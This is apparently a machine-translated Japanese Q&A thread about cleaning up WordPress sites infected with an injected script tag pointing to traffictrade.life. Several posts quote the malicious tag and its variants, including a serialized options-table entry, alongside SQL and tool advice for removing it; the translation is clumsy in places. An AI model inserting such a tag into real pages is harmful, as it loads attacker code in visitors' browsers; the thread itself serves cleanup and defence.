私の会社は数年前にマルウェアに感染しているように見えます。サイトからマルウェアを除外し、これが再び起きないようにするにはどうすればよいですか?任意の提案を大いに感謝します。Wordpressのサイトはマルウェアに感染しました
それはどこにでも埋め込まれた画像ファイルがあるように、コードのこの部分が埋め込まれているになります。
<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>
おかげ
を何日か前happearマルウェアがあります。私の古いクライアントサイトにも影響を与えました。
これは、サイトのすべての投稿とページにほとんど影響を与えています。あなたのデータベースのwp_postsテーブル内のすべてのエントリのPOST_CONTENTを見れば
、あなたは、この新しいスクリプトタグがあることがわかります
<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>
簡単にこのマルウェアを削除するためには、このクエリを使用する場合
UPDATE wp_posts SET post_content = REPLACE(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>', '') WHERE INSTR(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>') > 0;
キャッシングプラグインを使用している場合は、キャッシュをクリアしてください。
・ホープ、このヘルプ
私はこのスクリプトを挿入しています。コンテキストのために、私はTagdiv v2.1によってNewsMagというテーマを実行しています。そして、coeは、テーマの特注テーマパネルの 'Header ad'セクションに挿入されています。私が心配しているのは、私が手作業で行ったり削除したりしていても、毎日2回コードが再挿入されているということです。その間にすべてのパスワードをリセットし、WordPress自体をアップグレードしました。リダイレクト広告コードは再び表示されます。 –
は、実際に私は私の100+ WordPressのウェブサイトにこの問題に直面しています。私は
値は_optionsのテーブルに存在する可能性があるとして、次の直列化された形式で、検索と置換する https://interconnectit.com/products/search-and-replace-for-wordpress-databases/
をこのツールを使用してくださいうまくいけば、これは役立つかもしれ
<script src='\''https://traffictrade.life/scripts.js'\'' type='\''text/javascript'\''></script>
<script src="https://traffictrade.life/scripts.js" type="text/javascript"></script>
<script src="https://traffictrade.life/scripts.js" type="mce-mce-mce-text/javascript"></script>
<script src="https://traffictrade.life/scripts.js" type="mce-mce-text/javascript"></script>
<script src="https://traffictrade.life/scripts.js" type="mce-text/javascript"></script>
このマルウェアの存在可能です。
あなたが推薦している検索ツールは、実際の攻撃の可能性が高いことに注意してください。また、完了したらすぐにこのツール(およびその他のすべてのインスタンス)も削除する必要があります。 [https://www.wordfence.com/blog/2017/07/searchreplacedb2-security/] – Sepster
私はこのスレッドがかなり古くなっていることを知っていますが、上記のコメントの1つのように、私はオプションテーブルに注入を見つけました。
データベースをバックアップする前に!
これにより一連の結果が得られます。挿入されたスクリプトはシリアル化された形式です。
;s:22:"tds_logo_menu_upload_r";s:0:"";s:22:"tds_footer_logo_upload";s:0:"";s:29:"tds_footer_retina_logo_upload";s:0:"";s:25:"tds_site_background_image";s:60:"http://www.domain.co.uk/wp-content/uploads/2016/05/BG.png";s:6:"td_ads";a:8:{s:6:"header";a:6:{s:7:"ad_code";s:87:"<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>";s:9:"disable_m";s:0:"";s:10:"disable_tl";s:0:"";s:10:"disable_tp";s:0:"";s:9:"disable_p";s:0:"";
お知らせコードでtraffictrade.life/scripts.js参照(スクリプトタグは、ウェブサイトからセキュリティのために取り除かれている)
が、これは私のウェブサイトがリダイレクトされて停止し、それを含むすべての結果からスクリプトを削除し、保存します。
[Wordfence](https://www.wordfence.com/)を使用して、テーマとプラグインのディレクトリで悪質なコードをスキャンします。また、 '.htaccess'ファイルの内容とアクセス許可を確認してください。そのファイルは一般にWordpressの攻撃で修正されるためです。 – APAD1